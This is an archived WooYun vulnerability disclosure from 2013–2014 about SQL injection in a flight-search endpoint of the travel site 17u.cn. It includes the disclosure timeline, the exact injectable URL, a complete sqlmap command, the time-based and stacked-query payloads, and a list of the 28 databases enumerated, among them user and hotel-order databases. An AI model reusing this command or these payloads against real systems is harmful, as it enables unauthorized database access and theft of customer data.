乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-12-20: 细节已通知厂商并且等待厂商处理中 2013-12-23: 厂商已经确认,细节仅向厂商公开 2014-01-02: 细节向核心白帽子及相关领域专家公开 2014-01-12: 细节向普通白帽子公开 2014-01-22: 细节向实习白帽子公开 2014-02-03: 细节向公众公开
0.0
注入点:www.17u.cn/flight/ajaxcn.ashx?aircompanycode=&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function%20getSeconds()%20{%20%20%20%20[native%20code]}&Type=getdpdata&typevalue=3
get参数aircompanycode存在注入通知存在注入点,未做进一步测试!
python sqlmap.py -u "www.17u.cn/flight/ajaxcn.ashx?aircompanycode=&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function%20getSeconds()%20{%20%20%20%20[native%20code]}&Type=getdpdata&typevalue=3" --user-agent="Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" --batch --dbssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: aircompanycode Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: aircompanycode='; WAITFOR DELAY '0:0:5'--&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function getSeconds() { [native code]}&Type=getdpdata&typevalue=3 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: aircompanycode=' WAITFOR DELAY '0:0:5'--&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function getSeconds() { [native code]}&Type=getdpdata&typevalue=3available databases [28]:[*] 17u_net[*] 17uEbookingHistory[*] IpData[*] master[*] model[*] msdb[*] TCB2cBlog[*] TCB2cWenDa[*] TCCar[*] TCCline[*] TCCLineResource[*] TCEbook[*] TCFly[*] TCFlyUtility[*] TCHotel[*] TCHotelFinance[*] TCHotelOrder[*] TCHotelRedundant[*] TCHotelResource[*] TCMapBarData[*] TCMapBarDataClass[*] TCScenery[*] TcSceneryParameter[*] TcSceneryResource[*] TCShare[*] TCUserInfo[*] TCWEB[*] tempdb
过滤
危害等级:中
漏洞Rank:8
确认时间:2013-12-23 08:07
正在处理中,感谢 @秋风
暂无